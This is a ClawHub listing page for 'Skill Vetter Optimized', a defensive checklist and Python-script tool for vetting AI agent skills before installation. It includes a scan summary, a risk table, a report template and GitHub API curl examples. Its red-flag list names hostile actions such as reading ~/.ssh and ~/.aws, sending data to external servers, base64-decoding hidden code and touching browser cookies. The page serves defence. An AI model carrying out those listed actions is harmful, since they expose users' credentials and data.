ClawHub

Skill Vetter Optimized

v2.0.0

🔒 优化版技能审查器 - 安全优先的AI代理技能审查工具。在从ClawHub、GitHub或其他来源安装任何技能前使用。检查红标、权限范围和可疑模式。包含实用工具和系统化审查清单。基于原始skill-vetter优化,添加了Python检查脚本和详细审查流程。

0· 121·0 current·0 all-time
bykvs-GoN@confidentkai

Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for confidentkai/skill-vetter-optimized.

Previewing Install & Setup.
Prompt PreviewInstall & Setup
Install the skill "Skill Vetter Optimized" (confidentkai/skill-vetter-optimized) from ClawHub.
Skill page: https://clawhub.ai/confidentkai/skill-vetter-optimized
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

Bare skill slug

openclaw skills install skill-vetter-optimized

ClawHub CLI

Package manager switcher

npx clawhub@latest install skill-vetter-optimized
Security Scan
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Benign
high confidence
Purpose & Capability
Name/description (a skill-vetting utility) match the included assets: SKILL.md, a checklist, and a Python inspection script. Nothing in the bundle requests unrelated credentials, binaries, or config paths.
Instruction Scope
SKILL.md directs the agent/user to run the included Python script against skill directories and provides example GitHub curl commands. The script only reads files under the supplied target path and searches for risky patterns — this is appropriate for a vetter. Note: the examples include network curl usage (for user-driven repo queries) and the script flags many patterns (e.g., requests.get, subprocess.run) which can produce false positives for benign code.
Install Mechanism
No install spec; the skill is instruction-only with a small helper script included. Nothing is downloaded or written to disk at install time beyond the normal skill files.
Credentials
No required environment variables, credentials, or special config paths are declared or used. The script operates on a provided filesystem path only, which is proportional to the stated purpose.
Persistence & Privilege
always is false and the skill is user-invocable. It does not request persistent system privileges, modify other skills, or require elevation. Autonomous invocation is allowed by default but not combined with other red flags.
Assessment
This skill appears to be what it says: a vetting tool with a small Python helper that scans a target skill directory for risky patterns. Before using: (1) run the script on a copy or in a sandbox when testing unknown skills, (2) remember the script only detects patterns (possible false positives/negatives) — perform manual code review for anything flagged, and (3) do not run it in a context where it would be given access to secret folders (~/.ssh, ~/.aws) unless you intentionally want to scan those paths. If you plan to invoke the example curl commands, review them first and avoid piping remote scripts into a shell.

Like a lobster shell, security has layers — review code before you run it.

latestvk97bf24nb43hwmw9rchnr46rc584wfxr
121downloads
0stars
1versions
Updated 1w ago
v2.0.0
MIT-0
kvs-GoN@confidentkai
latest
Download

Skill Vetter Optimized 🔒✨

优化版技能审查器 - 基于原始skill-vetter优化增强

🚀 优化亮点

新增实用工具 - Python检查脚本快速分析技能目录
系统化审查流程 - 四阶段审查清单
详细文档 - 完整的审查指南和示例
保持兼容 - 完全兼容原始审查协议
性能优化 - 更快的审查流程

Security-first vetting protocol for AI agent skills. Never install a skill without vetting it first.

When to Use

  • Before installing any skill from ClawdHub
  • Before running skills from GitHub repos
  • When evaluating skills shared by other agents
  • Anytime you're asked to install unknown code

Vetting Protocol

Step 1: Source Check

Questions to answer:
- [ ] Where did this skill come from?
- [ ] Is the author known/reputable?
- [ ] How many downloads/stars does it have?
- [ ] When was it last updated?
- [ ] Are there reviews from other agents?

Step 2: Code Review (MANDATORY)

Read ALL files in the skill. Check for these RED FLAGS:

🚨 REJECT IMMEDIATELY IF YOU SEE:
─────────────────────────────────────────
• curl/wget to unknown URLs
• Sends data to external servers
• Requests credentials/tokens/API keys
• Reads ~/.ssh, ~/.aws, ~/.config without clear reason
• Accesses MEMORY.md, USER.md, SOUL.md, IDENTITY.md
• Uses base64 decode on anything
• Uses eval() or exec() with external input
• Modifies system files outside workspace
• Installs packages without listing them
• Network calls to IPs instead of domains
• Obfuscated code (compressed, encoded, minified)
• Requests elevated/sudo permissions
• Accesses browser cookies/sessions
• Touches credential files
─────────────────────────────────────────

Step 3: Permission Scope

Evaluate:
- [ ] What files does it need to read?
- [ ] What files does it need to write?
- [ ] What commands does it run?
- [ ] Does it need network access? To where?
- [ ] Is the scope minimal for its stated purpose?

Step 4: Risk Classification

Risk LevelExamplesAction
🟢 LOWNotes, weather, formattingBasic review, install OK
🟡 MEDIUMFile ops, browser, APIsFull code review required
🔴 HIGHCredentials, trading, systemHuman approval required
⛔ EXTREMESecurity configs, root accessDo NOT install

Output Format

After vetting, produce this report:

SKILL VETTING REPORT
═══════════════════════════════════════
Skill: [name]
Source: [ClawdHub / GitHub / other]
Author: [username]
Version: [version]
───────────────────────────────────────
METRICS:
• Downloads/Stars: [count]
• Last Updated: [date]
• Files Reviewed: [count]
───────────────────────────────────────
RED FLAGS: [None / List them]

PERMISSIONS NEEDED:
• Files: [list or "None"]
• Network: [list or "None"]  
• Commands: [list or "None"]
───────────────────────────────────────
RISK LEVEL: [🟢 LOW / 🟡 MEDIUM / 🔴 HIGH / ⛔ EXTREME]

VERDICT: [✅ SAFE TO INSTALL / ⚠️ INSTALL WITH CAUTION / ❌ DO NOT INSTALL]

NOTES: [Any observations]
═══════════════════════════════════════

实用工具

1. 技能检查脚本

使用内置的Python脚本快速检查技能目录:

# 检查技能目录的基本信息和安全风险
python3 /root/.openclaw/skills/skill-vetter/scripts/skill_checker.py /path/to/skill

2. GitHub仓库检查

对于GitHub托管的技能:

# 检查仓库统计信息
curl -s "https://api.github.com/repos/OWNER/REPO" | jq '{stars: .stargazers_count, forks: .forks_count, updated: .updated_at}'

# 列出技能文件
curl -s "https://api.github.com/repos/OWNER/REPO/contents/skills/SKILL_NAME" | jq '.[].name'

# 获取并审查SKILL.md
curl -s "https://raw.githubusercontent.com/OWNER/REPO/main/skills/SKILL_NAME/SKILL.md"

3. 使用审查清单

参考 references/checklist.md 进行系统化的技能审查。

Trust Hierarchy

  1. Official OpenClaw skills → Lower scrutiny (still review)
  2. High-star repos (1000+) → Moderate scrutiny
  3. Known authors → Moderate scrutiny
  4. New/unknown sources → Maximum scrutiny
  5. Skills requesting credentials → Human approval always

Remember

  • No skill is worth compromising security
  • When in doubt, don't install
  • Ask your human for high-risk decisions
  • Document what you vet for future reference

Paranoia is a feature. 🔒🦀

Comments

Loading comments...